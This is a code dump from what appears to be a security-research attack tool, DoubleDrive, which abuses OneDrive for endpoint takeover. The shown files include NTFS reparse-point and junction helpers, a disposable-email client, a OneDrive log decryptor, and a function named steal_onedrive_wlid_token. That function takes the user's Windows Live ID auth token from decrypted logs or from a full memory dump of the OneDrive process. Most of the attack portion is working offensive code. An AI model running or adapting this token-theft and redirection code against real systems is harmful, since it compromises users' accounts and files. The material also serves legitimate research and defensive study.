REPARSE_DATA_BUFFER_HEADER_LENGTH; 61 | 62 | reparse_data_buffer = ctypes.create_string_buffer(b"\x00" * (total_size-1)) 63 | reparse_data_struct = ctypes.cast(reparse_data_buffer, ctypes.POINTER(REPARSE_DATA_BUFFER)).contents 64 | reparse_data_struct.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT 65 | reparse_data_struct.ReparseDataLength = path_buffer_byte_size 66 | 67 | reparse_data_struct.MountPointReparseBuffer.SubstituteNameOffset = 0 68 | reparse_data_struct.MountPointReparseBuffer.SubstituteNameLength = unicode_target_path_byte_size 69 | 70 | path_buffer_address = ctypes.addressof(reparse_data_struct) + REPARSE_DATA_BUFFER_HEADER_LENGTH + getattr(MOUNT_POINT_REPARSE_BUFFER, "PathBuffer").offset 71 | path_buffer_pointer = ctypes.cast(path_buffer_address, ctypes.POINTER(ctypes.c_byte)) 72 | ctypes.memmove(path_buffer_pointer, unicode_target_path, unicode_target_path_byte_size + 2) 73 | 74 | reparse_data_struct.MountPointReparseBuffer.PrintNameOffset = unicode_target_path_byte_size + 2 75 | reparse_data_struct.MountPointReparseBuffer.PrintNameLength = unicode_print_name_byte_size 76 | 77 | print_name_address = ctypes.addressof(reparse_data_struct) + REPARSE_DATA_BUFFER_HEADER_LENGTH + getattr(MOUNT_POINT_REPARSE_BUFFER, "PathBuffer").offset + unicode_target_path_byte_size + 2 78 | print_name_pointer = ctypes.cast(print_name_address, ctypes.POINTER(ctypes.c_byte)) 79 | ctypes.memmove(print_name_pointer, unicode_print_name, unicode_print_name_byte_size + 2) 80 | 81 | return bytes(reparse_data_buffer) 82 | 83 | 84 | def set_reparse_point(reparse_point_path, reparse_data_buffer, is_dir=False): 85 | file_flags = win32file.FILE_FLAG_OPEN_REPARSE_POINT 86 | if is_dir: 87 | try: 88 | win32file.CreateDirectoryW(reparse_point_path, None) 89 | except pywintypes.error: 90 | pass 91 | file_flags |= win32file.FILE_FLAG_BACKUP_SEMANTICS 92 | else: 93 | open(reparse_point_path, "wb").close() 94 | 95 | reparse_point_handle = win32file.CreateFile(reparse_point_path, win32file.GENERIC_READ | win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, file_flags, 0) 96 | win32file.DeviceIoControl(reparse_point_handle, winioctlcon.FSCTL_SET_REPARSE_POINT, reparse_data_buffer, None, None) 97 | 98 | 99 | def create_ntfs_symlink(reparse_point_path, target_path, relative=False, print_name=None, is_dir=False): 100 | if None == print_name: print_name = target_path 101 | reparse_data_buffer = create_symlink_reparse_buffer(target_path, print_name, relative) 102 | set_reparse_point(reparse_point_path, reparse_data_buffer, is_dir) 103 | 104 | 105 | def create_mount_point(reparse_point_path, target_path, relative=False, print_name=None): 106 | if None == print_name: print_name = target_path 107 | reparse_data_buffer = create_mount_point_reparse_buffer(target_path, print_name, relative) 108 | set_reparse_point(reparse_point_path, reparse_data_buffer, True) 109 | 110 | -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/reparse_points/reparse_structs.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | from ctypes.wintypes import * 3 | 4 | class GENERIC_REPARSE_BUFFER(Structure): 5 | _fields_ = (('DataBuffer', BYTE * 1),) 6 | 7 | class SYMBOLIC_LINK_REPARSE_BUFFER(Structure): 8 | _fields_ = (('SubstituteNameOffset', USHORT), 9 | ('SubstituteNameLength', USHORT), 10 | ('PrintNameOffset', USHORT), 11 | ('PrintNameLength', USHORT), 12 | ('Flags', ULONG), 13 | ('PathBuffer', WCHAR * 1)) 14 | 15 | 16 | class MOUNT_POINT_REPARSE_BUFFER(Structure): 17 | _fields_ = (('SubstituteNameOffset', USHORT), 18 | ('SubstituteNameLength', USHORT), 19 | ('PrintNameOffset', USHORT), 20 | ('PrintNameLength', USHORT), 21 | ('PathBuffer', WCHAR * 1)) 22 | 23 | 24 | class REPARSE_DATA_BUFFER(Structure): 25 | class REPARSE_BUFFER(Union): 26 | _fields_ = (('SymbolicLinkReparseBuffer', 27 | SYMBOLIC_LINK_REPARSE_BUFFER), 28 | ('MountPointReparseBuffer', 29 | MOUNT_POINT_REPARSE_BUFFER), 30 | ('GenericReparseBuffer', 31 | GENERIC_REPARSE_BUFFER)) 32 | _fields_ = (('ReparseTag', ULONG), 33 | ('ReparseDataLength', USHORT), 34 | ('Reserved', USHORT), 35 | ('ReparseBuffer', REPARSE_BUFFER)) 36 | _anonymous_ = ('ReparseBuffer',) 37 | 38 | 39 | dummy_object = REPARSE_DATA_BUFFER() -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/temp_email.py: -------------------------------------------------------------------------------- 1 | import random 2 | import requests 3 | import uuid 4 | from dataclasses import dataclass 5 | 6 | @dataclass 7 | class EmailMessage: 8 | source_email: str 9 | subject: str 10 | content: str 11 | 12 | class TempEmail: 13 | 14 | def __init__(self, email_address: str = None) -> None: 15 | self.domain = None 16 | self.username = None 17 | if None == email_address: 18 | self.generate_new_address() 19 | else: 20 | self.username = email_address[:email_address.index("@")] 21 | self.domain = email_address[email_address.index("@")+1:] 22 | 23 | def generate_new_address(self): 24 | res = requests.get("https://www.1secmail.com/api/v1/?action=getDomainList") 25 | self.domain = random.choice(res.json()) 26 | self.username = uuid.uuid4() 27 | 28 | def get_messages(self) -> list[EmailMessage]: 29 | res = requests.get(f"https://www.1secmail.com/api/v1/?action=getMessages&login={self.username}&domain={self.domain}") 30 | messages_json = res.json() 31 | 32 | result_messages = [] 33 | for message_json in messages_json: 34 | message_id = message_json["id"] 35 | res = requests.get(f"https://www.1secmail.com/api/v1/?action=readMessage&login={self.username}&domain={self.domain}&id={message_id}") 36 | full_message_json = res.json() 37 | new_message = EmailMessage(full_message_json["from"], full_message_json["subject"], full_message_json["body"]) 38 | result_messages.append(new_message) 39 | 40 | return result_messages -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/token_extraction/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/token_extraction/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/token_extraction/onedrive/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/token_extraction/onedrive/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/token_extraction/onedrive/odl_parser/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SafeBreach-Labs/DoubleDrive/2fd42d62b8a53ce113a12b461bb3d56d97a231c1/src/doubledrive/endpoint_takeover_utils/token_extraction/onedrive/odl_parser/__init__.py -------------------------------------------------------------------------------- /src/doubledrive/endpoint_takeover_utils/token_extraction/onedrive/odl_parser/odl.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import datetime 3 | import glob 4 | import gzip 5 | import io 6 | import json 7 | import os 8 | import re 9 | import string 10 | import struct 11 | from datetime import date 12 | 13 | from construct import * 14 | from construct.core import Int32ul, Int64ul 15 | from Crypto.Cipher import AES 16 | from Crypto.Util.Padding import unpad 17 | 18 | control_chars = "".join(map(chr, range(0,32))) + "".join(map(chr, range(127,160))) 19 | not_control_char_re = re.compile(f"[^{control_chars}]" + "{4,}") 20 | # If we only want ascii, use "ascii_chars_re" below 21 | printable_chars_for_re = string.printable.replace("\\", "\\\\").replace("[", "\\[").replace("]", "\\]").encode() 22 | ascii_chars_re = re.compile(b"[{" + printable_chars_for_re + b"}]" + b"{4,}") 23 | 24 | def ReadUnixMsTime(unix_time_ms): # Unix millisecond timestamp 25 | """Returns datetime object, or empty string upon error""" 26 | if unix_time_ms not in ( 0, None, ""): 27 | try: 28 | if isinstance(unix_time_ms, str): 29 | unix_time_ms = float(unix_time_ms) 30 | return datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=unix_time_ms/1000) 31 | except (ValueError, OverflowError, TypeError) as ex: 32 | #print("ReadUnixMsTime() Failed to convert timestamp from value " + str(unix_time_ms) + " Error was: " + str(ex)) 33 | pass 34 | return "" 35 | 36 | CDEF = Struct( 37 | "signature" / Int64ul, # CCDDEEFF00000000 38 | "timestamp" / Int64ul, 39 | "unk1" / Int32ul, 40 | "unk2" / Int32ul, 41 | "unknown" / Byte[20], 42 | "one" / Int32ul, # 1 43 | "data_len" / Int32ul, 44 | "reserved" / Int32ul # 0 45 | # followed by Data 46 | ) 47 | 48 | Odl_header = Struct( 49 | "signature" / Int64ul, # EBFGONED 50 | "unk_version" / Int32ul, 51 | "unknown_2" / Int32ul, 52 | "unknown_3" / Int64ul, 53 | "unknown_4" / Int32ul, 54 | "one_drive_version" / Byte[0x40], 55 | "windows_version" / Byte[0x40], 56 | "reserved" / Byte[0x64] 57 | ) 58 | 59 | def read_string(data): 60 | """read string, return tuple (bytes_consumed, string)""" 61 | if (len(data)) >= 4: 62 | str_len = struct.unpack(" len(data): 65 | print("Error in read_string()") 66 | else: 67 | return (4 + str_len, data[4:4 + str_len].decode("utf8", "ignore")) 68 | return (4, "") 69 | 70 | def guess_encoding(obfuscation_map_path): 71 | """Returns either UTF8 or UTF16LE after checking the file""" 72 | encoding = "utf-16le" # on windows this is the default 73 | with open(obfuscation_map_path, "rb") as f: 74 | data = f.read(4) 75 | if len(data) == 4: 76 | if data[1] == 0 and data[3] == 0 and data[0] != 0 and data[2] != 0: 77 | pass # confirmed utf-16le 78 | else: 79 | encoding = "utf8" 80 | return encoding 81 | 82 | # UnObfuscation code 83 | key = "" 84 | utf_type = "utf16" 85 | 86 | def decrypt(cipher_text): 87 | """cipher_text is expected to be base64 encoded""" 88 | global key 89 | global utf_type 90 | 91 | if key == "": 92 | return "" 93 | if len(cipher_text) < 22: 94 | return "" # invalid 95 | # add proper base64 padding 96 | remainder = len(cipher_text) % 4 97 | if remainder == 1: 98 | return "" # invalid b64 99 | elif remainder in (2, 3): 100 | cipher_text += "="* (4 - remainder) 101 | try: 102 | cipher_text = cipher_text.replace("_", "/").replace("-", "+") 103 | cipher_text = base64.b64decode(cipher_text) 104 | except: 105 | return "" 106 | 107 | if len(cipher_text) % 16 != 0: 108 | return "" 109 | else: 110 | pass 111 | 112 | try: 113 | cipher = AES.new(key, AES.MODE_CBC, iv=b"\0"*16) 114 | raw = cipher.decrypt(cipher_text) 115 | except ValueError as ex: 116 | print("Exception while decrypting data", str(ex)) 117 | return "" 118 | try: 119 | plain_text = unpad(raw, 16) 120 | except ValueError as ex: 121 | #print("Error in unpad!", str(ex), raw) 122 | return "" 123 | try: 124 | plain_text = plain_text.decode(utf_type)#, "ignore") 125 | except ValueError as ex: 126 | print(f"Error decoding {utf_type}", str(ex)) 127 | return plain_text 128 | 129 | def read_keystore(keystore_path): 130 | global key 131 | global utf_type 132 | encoding = guess_encoding(keystore_path) 133 | with open(keystore_path, "r", encoding=encoding) as f: 134 | try: 135 | j = json.load(f) 136 | key = j[0]["Key"] 137 | version = j[0]["Version"] 138 | utf_type = "utf32" if key.endswith("\\u0000\\u0000") else "utf16" 139 | print(f"Recovered Unobfuscation key {key}, version={version}, utf_type={utf_type}") 140 | key = base64.b64decode(key) 141 | if version != 1: 142 | print(f"WARNING: Key version {version} is unsupported. This may not work. Contact the author if you see this to add support for this version.") 143 | except ValueError as ex: 144 | print("JSON error " + str(ex)) 145 | 146 | def read_obfuscation_map(obfuscation_map_path, store_all_key_values): 147 | map = {} 148 | repeated_items_found = False 149 | encoding = guess_encoding(obfuscation_map_path) 150 | with open(obfuscation_map_path, "r", encoding=encoding) as f: 151 | for line in f.readlines(): 152 | line = line.rstrip("\n") 153 | terms = line.split("\t") 154 | if len(terms) == 2: 155 | if terms[0] in map: #REPEATED item found! 156 | repeated_items_found = True 157 | if not store_all_key_values: 158 | continue # newer items are on top, skip older items found below. 159 | old_val = map[terms[0]] 160 | new_val = f"{old_val}|{terms[1]}" 161 | map[terms[0]] = new_val 162 | last_key = terms[0] 163 | last_val = new_val 164 | else: 165 | map[terms[0]] = terms[1] 166 | last_key = terms[0] 167 | last_val = terms[1] 168 | else: 169 | if terms[0] in map: 170 | if not store_all_key_values: 171 | continue 172 | last_val += "\n" + line 173 | map[last_key] = last_val 174 | #print("Error? " + str(terms)) 175 | if repeated_items_found: 176 | print("WARNING: Multiple instances of some keys were found in the ObfuscationMap.") 177 | return map 178 | 179 | def tokenized_replace(string, map): 180 | output = "" 181 | tokens = ":\\.@%#&*|{}!?<>;:~()//\"'" 182 | parts = [] # [ ("word", 1), (":", 0), ..] word=1, token=0 183 | last_word = "" 184 | last_token = "" 185 | for i, char in enumerate(string): 186 | if char in tokens: 187 | if last_word: 188 | parts.append((last_word, 1)) 189 | last_word = "" 190 | if last_token: 191 | last_token += char 192 | else: 193 | last_token = char 194 | else: 195 | if last_token: 196 | parts.append((last_token, 0)) 197 | last_token = "" 198 | if last_word: 199 | last_word += char 200 | else: 201 | last_word = char 202 | if last_token: 203 | parts.append((last_token, 0)) 204 | if last_word: 205 | parts.append((last_word, 1)) 206 | 207 | # now join all parts replacing the words 208 | for part in parts: 209 | if part[1] == 0: # token 210 | output += part[0] 211 | else: # word 212 | word = part[0] 213 | decrypted_word = decrypt(word) 214 | if decrypted_word: 215 | output += decrypted_word 216 | elif word in map: 217 | output += map[word] 218 | else: 219 | output += word 220 | return output 221 | 222 | def extract_strings(data, map, unobfuscate=True): 223 | extracted = [] 224 | #for match in not_control_char_re.finditer(data): # This gets all unicode chars, can include lot of garbage if you only care about English, will miss out other languages 225 | for match in ascii_chars_re.finditer(data): # Matches ONLY Ascii (old behavior) , good if you only care about English 226 | text = match.group() 227 | if match.start() >= 4: 228 | match_len = match.end() - match.start() 229 | y = data[match.start() - 4 : match.start()] 230 | stored_len = struct.unpack(" int: 82 | for token_search_value in TOKEN_SEARCH_VALUES: 83 | unicode_prefix_to_search = token_search_value.encode("UTF-16LE") 84 | 85 | token_start_index = dump_buffer.find(unicode_prefix_to_search) 86 | 87 | if token_start_index == -1: 88 | continue 89 | 90 | token_start_index += len(unicode_prefix_to_search) # Padding from token_start_index 91 | 92 | try: 93 | return extract_wlid_token_from_buffer_in_index(dump_buffer, token_start_index) 94 | except: 95 | extract_wlid_token_from_buffer(dump_buffer[token_start_index:]) 96 | 97 | return None 98 | 99 | 100 | def extract_windows_live_id_from_procdump(onedrive_pid = None): 101 | if None == onedrive_pid: 102 | current_user = win32api.GetUserNameEx(win32con.NameSamCompatible) 103 | onedrive_pid = get_process_pid_by_name(ONEDRIVE_PROCESS_NAME, username=current_user) 104 | 105 | tempfile_fd, tempfile_path = tempfile.mkstemp() 106 | os.close(tempfile_fd) 107 | create_dump(onedrive_pid, tempfile_path, MINIDUMP_TYPE_MiniDumpWithFullMemory) 108 | 109 | with open(tempfile_path, "rb") as f: 110 | token = extract_wlid_token_from_buffer(f.read()) 111 | 112 | os.remove(tempfile_path) 113 | 114 | return f"{WLID_TOKEN_PREFIX}{token}" 115 | 116 | 117 | def extract_windows_live_id_from_odls(): 118 | odl_rows = get_odl_rows() 119 | latest_token_odl = None 120 | for odl in odl_rows[::-1]: 121 | if "NotificationServiceImpl::InternalConnect" == odl["Function"] or "CWNPTransportImpl::Connect" == odl["Function"]: 122 | latest_token_odl = odl 123 | break 124 | 125 | if None == latest_token_odl: 126 | return None 127 | 128 | root_xml_element = ET.fromstring(latest_token_odl["Params_Decoded"][1]) 129 | wlid_ticket = root_xml_element.find("ssl-compact-ticket").text 130 | 131 | return f"{ODL_WLID_EXTRACTED_TOKEN_PREFIX}{wlid_ticket}" 132 | 133 | def steal_onedrive_wlid_token(): 134 | token = extract_windows_live_id_from_odls() 135 | if None == token: 136 | restart_onedrive(get_onedrive_info()) 137 | time.sleep(WAIT_FOR_ONEDRIVE_TO_LOG_TOKEN_DELAY) 138 | token = extract_windows_live_id_from_odls() 139 | if None == token: 140 | token = extract_windows_live_id_from_procdump() 141 | return token --------------------------------------------------------------------------------